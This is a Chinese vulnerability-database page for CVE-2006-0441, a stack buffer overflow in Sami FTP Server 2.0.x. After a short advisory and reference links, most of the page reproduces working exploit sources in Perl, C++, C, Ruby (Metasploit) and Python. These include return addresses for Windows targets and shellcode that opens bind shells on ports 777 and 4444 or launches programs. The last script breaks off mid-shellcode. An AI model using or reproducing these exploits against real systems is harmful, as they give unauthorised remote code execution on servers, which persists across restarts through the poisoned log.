CVE-2006-0441
CVSS7.5
发布时间 :2006-01-26 17:03:00
修订时间 :2011-03-07 21:30:03
NMCOEP    

[原文]Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.


[CNNVD]Sami FTP Server 堆栈缓冲区溢出(CNNVD-200601-353)

        Sami FTP Server 2.0.1中存在堆栈的缓冲区溢出,远程攻击者可以通过在查看日志时会触发溢出的长USER命令执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0441
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0441
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-353
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0317
(UNKNOWN)  VUPEN  ADV-2006-0317
http://www.securityfocus.com/bid/16370
(UNKNOWN)  BID  16370
http://www.critical.lt/?vulnerabilities/208
(VENDOR_ADVISORY)  MISC  http://www.critical.lt/?vulnerabilities/208
http://secunia.com/advisories/18574
(VENDOR_ADVISORY)  SECUNIA  18574
http://xforce.iss.net/xforce/xfdb/24325
(UNKNOWN)  XF  samiftpserver-user-bo(24325)
http://www.securityfocus.com/archive/1/archive/1/423148/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060124 SamiFTPd buffer overflow
http://www.karjasoft.com/samiftp/news
(UNKNOWN)  CONFIRM  http://www.karjasoft.com/samiftp/news
http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.pl
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.pl

- 漏洞信息

Sami FTP Server 堆栈缓冲区溢出
高危 缓冲区溢出
2006-01-26 00:00:00 2006-01-27 00:00:00
远程  
        Sami FTP Server 2.0.1中存在堆栈的缓冲区溢出,远程攻击者可以通过在查看日志时会触发溢出的长USER命令执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1448)

Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC (EDBID:1448)
windows remote
2006-01-25 Verified
0 Critical Security
[点击下载] [点击下载]
#!/usr/bin/perl
# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))

use Net::FTP;                 # <- jo, að tinginys :)
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n";
print " Offsets: \n";
print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n";
print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n";
print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n";
print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\n";
print " If values not specified, default values will be used.\n";
print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
}
$host =   "127.0.0.1";        # aukos ip
$yourip = "127.0.0.1" ;       # Reikalingas tam, kad bûtø galima sulyginti ðelkodà, nes i steka ásiraðo ir jusu ip adresas, todel áraðykit savo iðorini (jei neturit tokio - gateway ip)
$offset = "\xE0\x3A\xB4\x76"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
$offset = $1 if ($_=~/-o(.*)/);
}
#offsetø suradimui naudokit findjmp.exe arba metasploit.com opcodø db ;)  (call esp/jmp esp..)
switch ($offset) {
case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
}

foreach $letter (split '', $yourip) { $c++;};
$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
$user = "A" x 213 . # vaþiuojam iki returno :O  (cia irgi galima kiðt ðelkodà :) )
"A" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
$offset .           # ret adresas á kokio dll'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
"\x90" x 25 .       # nop'ø sled'as, kad sulygintume su esp esanèiu adresu

# ðelkodas paleidþiantis notepadà (ðelkodas skirtas tiem kas sakë, jog critical mëgsta DoS :*) - norësit, ásidësit normalø..
"\xCD\x03".
"\xEB\x61\x56\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C".
"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\xC3\x60\x8B\x6C".
"\x24\x24\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA\x8B".
"\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x34\x49\x8B\x34".
"\x8B\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0\x74".
"\x07\xC1\xCF\x0D\x01\xC7\xEB\xF4\x3B\x7C\x24\x28".
"\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B".
"\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24".
"\x1C\x61\xC3\xE8\x9A\xFF\xFF\xFF\x68\x98\xFE\x8A".
"\x0E\x50\xE8\xA2\xFF\xFF\xFF\xEB\x02\xEB\x05\xE8".
"\xF9\xFF\xFF\xFF\x5B\x83\xC3\x1C\x33\xC9\x88\x0B".
"\x83\xEB\x0B\x41\x51\x53\xFF\xD0\x90\x6E\x6F\x74".
"\x65\x70\x61\x64\x2E\x65\x78\x65\x01";
$ftp->login("$user","biatch");

# milw0rm.com [2006-01-25]
		

- 漏洞信息 (1462)

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp) (EDBID:1462)
windows remote
2006-01-31 Verified
21 HolyGhost
[点击下载] [点击下载]
// Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib' 
#pragma comment(lib, "ws2_32")

char MyShellCode[] =       // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
                        "\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x98\x77\xF3\x93"
"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\xAD\x16\x71\x09"
"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x18\x75\x09\x98"
"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\xCE\xDE\xCE\xDE"
"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\x9A\x90\x10"
"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x8D\xCE\xCF\xCA"
"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3"
"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10"
"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\xDD\xBD\x89\xCD"
"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\xC8\x66\xCC\xA9"
"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\xCE\x66\xCC\x95"
"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD"
"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x7A\xAB\xD0\x12"
"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\xED\x9E\x58\x56"
"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x98\x72"
"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x98\x71\x72\x9B"
"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";

static char PayLoad[1329];  

int IP;                     
int Port;                   
int szNOP1, szNOP2;         
int Nop; 

// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = "\x0C\xED\xE3\x77";
// Flag ID server Sami FTP.
char TargetFlag[] = "220-\r\n220 Features p a .";
char RecvBuff[200];

void usage(){
  cout<<" "<<endl;
  cout<<"USAGE : ThisAppz [Target IP] [Port to connect FTP]"  <<endl;
  cout<<"If a port isnt specified, default port will 21."    <<endl;
  cout<<"Without IP, the Xploit run in local mode [127.0.0.1]"<<endl;
  cout<<" "<<endl;
  return;}

void Info(){
  cout<<" "<<endl;
  cout<<" ============================================== v1.0 =="<<endl;
  cout<<" ====== Sami FTP Remote Buffer Overflow Exploit  ======"<<endl;
  cout<<" ================== Coded by HolyGhost ================"<<endl;
  cout<<" ====== Distributed for educational purposes only ====="<<endl;
  cout<<" ================== StormyTeam@free.fr ================"<<endl;
  cout<<" ======================================================"<<endl;
  cout<<" "<<endl;}

int main(int argc,char *argv[]){

Info();
if ( ( argc > 3 ) ){usage();return -1;} 

if( argc > 1 ){ 
  cout<<"argv[1]"<<"\t"<<argv[1]<<endl;
  IP = htonl( inet_addr( argv[1] ) );}
else{ 
  cout<<"Local test mode : 127.0.0.1"<<endl;
  IP = htonl( inet_addr( "127.0.0.1" ) );}

if( argc == 3 ){
  cout<<"argv[2]"<<"\t"<<argv[2]<<endl;
  Port = atoi( argv[2] );}
else{
  cout<<"Port by default : 21"<<endl;
  Port = 21;}

WSADATA wsadata;

if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
  cout<<"[-] WSAStartup error. Bye!"<<endl;
  return -1;}

SOCKET sck;
fd_set mask;              
struct timeval timeout;
struct sockaddr_in server;

sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.

if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
 
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );

timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );

switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
  case -1:{ // Problem! 
    cout<<"[-] Select() error. Bye!"<<endl;
    closesocket( sck );
	return -1;}

  case 0:{ // Problem!
	cout<<"[-] Connect() error. Bye!"<<endl;
	closesocket( sck );
	return -1;}

  default: 
  if(FD_ISSET( sck, &mask ) ){
    recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID.

    cout<<"[+] Connected, checking the server for flag..."<<endl;
	Sleep( 500 );
	
    if ( !strstr( RecvBuff, TargetFlag ) ){
      cout<<"[-] This is not a valid flag from target! Bye."<<endl;
	  return -1;} // Bye!
	cout<<RecvBuff;

    Sleep( 1000 ); 
    cout<<"[+] Connected, constructing the PayLoad..."<<endl;
   
    szNOP1 = 219; // First padding.
	szNOP2 = 720; // Second padding. 
    // Initialise le Buffer PayLoad NULL.
    memset( PayLoad, NULL, sizeof( PayLoad ) );
    strcat( PayLoad, "USER " );     // Command User.
    // First padding.
    for( Nop = 0; Nop < szNOP1; Nop++ ){
	  strcat( PayLoad, "\x90" );}
    // New EIP register.
	strcat( PayLoad, JmpESP );
    // Second Padding.
    for( Nop = 0; Nop < szNOP2; Nop++ ){
	  strcat( PayLoad, "\x90" );}
    strcat( PayLoad, MyShellCode );
    strcat( PayLoad, "\x0D\x0A" );
    // Send fully PayLoad.
    if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
	  cout<<"[-] Sending error, the server prolly rebooted."<<endl;
	  return -1;}

    Sleep( 1000 ); 

    cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
    cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
    return 0;
  }
}

closesocket( sck );
WSACleanup();
return 0; // Bye!

}
// Fully PayLoad description (1329 Bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n]
// 5        219             4      720             379         2

// milw0rm.com [2006-01-31]
		

- 漏洞信息 (3127)

Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC (EDBID:3127)
windows dos
2007-01-14 Verified
0 Marsu
[点击下载] [点击下载]
/************************************************************************
*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow              *
*                                                                       *
*Sending a long USER / PASS request to server triggers the vulnerability*
*EAX and EDX are owned leading to code execution                        *
*This is only a POC                                                     *
*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery            *
*                                                                       *
*Usage: sami.exe ip port                                                *
*                                                                       *
*Coded by Marsu <Marsupilamipowa@hotmail.fr>                            *
************************************************************************/

#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
	struct hostent *he;
	struct sockaddr_in sock_addr;
	WSADATA wsa;
	int ftpsock;
	char recvbuff[1024];
	char evilbuff[1024];
	int buflen=600;// 650 will kill the app. 600 just call the debugger

	if (argc!=3)
	{
		printf("[+] Usage: %s <ip> <port>\n",argv[0]);
		return 1;
	}
	WSACleanup();
	WSAStartup(MAKEWORD(2,0),&wsa);

	printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
	if ((he=gethostbyname(argv[1])) == NULL) {
		printf("Failed\n[-] Could not init gethostbyname\n");
		return 1;
	}
	if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Failed\n[-] Socket error\n");
		return 1;
	}

	sock_addr.sin_family = PF_INET;
	sock_addr.sin_port = htons(atoi(argv[2]));
	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(sock_addr.sin_zero), '\0', 8);
	if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
		printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
		return 1;
	}
	printf("OK\n");
	memset(recvbuff,'\0',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	printf("[+] Building payload ... ");
	memset(evilbuff,'A',buflen);
	memset(evilbuff+585,'B',4);	//eax and edx will be 42424262
	memcpy(evilbuff,"USER ",5);
	memcpy(evilbuff+buflen,"\r\n\0",3);
	printf("OK\n[+] Sending USER ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");
	memset(recvbuff,'\0',1024);
	recv(ftpsock, recvbuff, 1024, 0);

	memcpy(evilbuff,"PASS ",5);
	printf("[+] Sending PASS ... ");
	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
		printf("Failed\n[-] Could not send\n");
		return 1;
	}
	printf("OK\n");
	recv(ftpsock, recvbuff, 1024, 0);

	printf("[+] Host should be down\n");
	return 0;
}

// milw0rm.com [2007-01-14]
		

- 漏洞信息 (3140)

Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit (EDBID:3140)
windows remote
2007-01-17 Verified
21 UmZ
[点击下载] [点击下载]
#!/usr/bin/perl
#		Exploit for SAMI FTP  version 2.0.2
#		USER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe) 
#		You can put you own shellcode to spawn a shell
#		Thrusday 17th  Jan 2007
#		Tested on : Windows 2000 SP4  (Use your own return address for other flavors)		
#		
#				
#		
#		Coded by UmZ! umz32.dll@gmail.com
#		On behalf of : Secure Bytes Inc.
#		http://www.secure-bytes.com/exploits/
#	
#
#	
#	    Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
#	    Disclaimer: This Proof of concept exploit is for educational purpose only.
#		        Please do not use it against any system without prior permission.
#          		You are responsible for yourself for what you do with this code.
#
#
#	    Note:	After executing the exploit You will get "Cannot login User or password not correct."
#			That doesn't mean exploit failed whenever you click on Sami FTP server it will crash 
#			resulting in the execution of calc.exe and will execute whenever the SAMI FTP server 
#			restarts until it is reinstalled.


use Net::FTP;


print "Coded by UmZ! umz32.dll@gmail.com\n";
print "http://www.secure-bytes.com/exploits/\n";
	
$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";

my $msg ="\x90" x596;      #140
my $msg2 ="B"x484;
my $shellcode =  "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8".
		 "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1".
		 "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07".
		 "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25".
		 "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5".
		 "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d".
		 "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4".
		 "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0".
		 "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c".
		 "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b".
		 "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4";

my $test= "\x90" x 108;

my $msg1=$msg. "\x70\xFD\x8B\x01"."\x96\x64\xF8\x77". $test .  $shellcode. "\r\n";

$ftp->login($msg1."\r\n\0","umz") or die "Cannot login ", $ftp->message;

$ftp->quit;

# milw0rm.com [2007-01-17]
		

- 漏洞信息 (16702)

KarjaSoft Sami FTP Server v2.02 USER Overflow (EDBID:16702)
windows remote
2010-04-30 Verified
21 metasploit
[点击下载] [点击下载]
##
# $Id: sami_ftpd_user.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
			'Description'	=> %q{
					This module exploits the KarjaSoft Sami FTP Server version 2.02
				by sending an excessively long USER string. The stack is overwritten
				when the administrator attempts to view the FTP logs. Therefore, this exploit
				is passive and requires end-user interaction. Keep this in mind when selecting
				payloads. When the server is restarted, it will re-execute the exploit until
				the logfile is manually deleted via the file system.
			},
			'Author'	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'	=> MSF_LICENSE,
			'Version'	=> '$Revision: 9179 $',
			'Stance'	=> Msf::Exploit::Stance::Passive,
			'References'	=>
				[
					# This exploit appears to have been reported multiple times.
					[ 'CVE', '2006-0441'],
					[ 'CVE', '2006-2212'],
					[ 'OSVDB', '25670'],
					[ 'BID', '16370'],
					[ 'BID', '22045'],
					[ 'BID', '17835'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1448'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1452'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1462'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3127'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3140'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'	=>
				{
					'Space'			=> 300,
					'BadChars'		=> "\x00\x0a\x0d\x20\xff",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 	=>
				[
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
					[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
				],
			'DisclosureDate' => 'Jan 24 2006'))

		register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /Sami FTP Server 2.0.2/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)

		login = "USER #{sploit}\r\n"
		login << "PASS " + Rex::Text.rand_char(payload_badchars)

		sock.put(login + "\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83185)

KarjaSoft Sami FTP Server v2.02 USER Overflow (PacketStormID:F83185)
2009-11-26 00:00:00
patrick  metasploit.com
exploit
CVE-2006-0441,CVE-2006-2212
[点击下载]

This Metasploit module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
			'Description'	=> %q{
				This module exploits the KarjaSoft Sami FTP Server version 2.02
				by sending an excessively long USER string. The stack is overwritten
				when the administrator attempts to view the FTP logs. Therefore, this exploit
				is passive and requires end-user interaction. Keep this in mind when selecting
				payloads. When the server is restarted, it will re-execute the exploit until
				the logfile is manually deleted via the file system.
			},
			'Author'	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'	=> MSF_LICENSE,
			'Version'	=> '$Revision$',
			'Stance'	=> Msf::Exploit::Stance::Passive,
			'References'	=>
				[
					# This exploit appears to have been reported multiple times.
					[ 'CVE', '2006-0441'],
					[ 'CVE', '2006-2212'],
					[ 'OSVDB', '25670'],
					[ 'BID', '16370'],
					[ 'BID', '22045'],
					[ 'BID', '17835'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1448'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1452'],
					[ 'URL', 'http://www.milw0rm.com/exploits/1462'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3127'],
					[ 'URL', 'http://www.milw0rm.com/exploits/3140'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},				
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'	=>
				{
					'Space'			=> 300,
					'BadChars'		=> "\x00\x0a\x0d\x20\xff",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 	=>
			[
				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
				[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
				[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
				[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll					 
			],
			'DisclosureDate' => 'Jan 24 2006'))

			register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /Sami FTP Server 2.0.2/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)

		login = "USER #{sploit}\r\n"
		login << "PASS " + Rex::Text.rand_char(payload_badchars)

		sock.put(login + "\r\n")

		handler
		disconnect
	end

end
    

- 漏洞信息 (F139468)

KarjaSoft Sami FTP Server 2.0.2 Buffer Overflow (PacketStormID:F139468)
2016-11-01 00:00:00
n30m1nd  
exploit,remote,overflow
CVE-2006-0441
[点击下载]

KarjaSoft Sami FTP server version 2.0.2 USER/PASS remote buffer overflow SEH exploit.

#/usr/bin/python
#-*- Coding: utf-8 -*-
 
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### 
 
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
 
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time... 
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
 
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write the IP to attack
# * Connect to the same IP on port 4444
#
# BONUS
# =====
# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
# start and so, it will crash and run our shellcode everytime it starts.
 
# Why?
# ====
# The graphical interface tries to show the user name which produces an overflow overwriting SEH
 
# Exploit code
# ============
 
import socket
import struct
 
def doHavoc(ipaddr):
    # Bad chars: 00 0d 0a ff
    alignment = "\x90"*3
     
    jmpfront = "345A7504".decode('hex')
    #CPU Disasm
    #Hex dump          Command 
    #  34 5A           XOR AL,5A
    #  75 04           JNE SHORT +04
     
    # pop pop ret in tmp01.dll
    popret = 0x10022ADE
     
    # fstenv trick to get eip: phrack number 62
    # and store it into EAX for the metasploit shell (BufferRegister)
    getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
    #CPU Disasm
    #Hex dump          Command
    #  D9EE            FLDZ
    #  D934E4          FSTENV SS:[ESP]
    #  8B44E4 0C       MOV EAX,DWORD PTR SS:[ESP+0C]
    #  04 0B           ADD AL,0B
 
    # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
    shellcode = (
        getEIPinEAX +
        "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
        "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
        "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
        "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
        "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
        "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
        "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
        "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
        "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
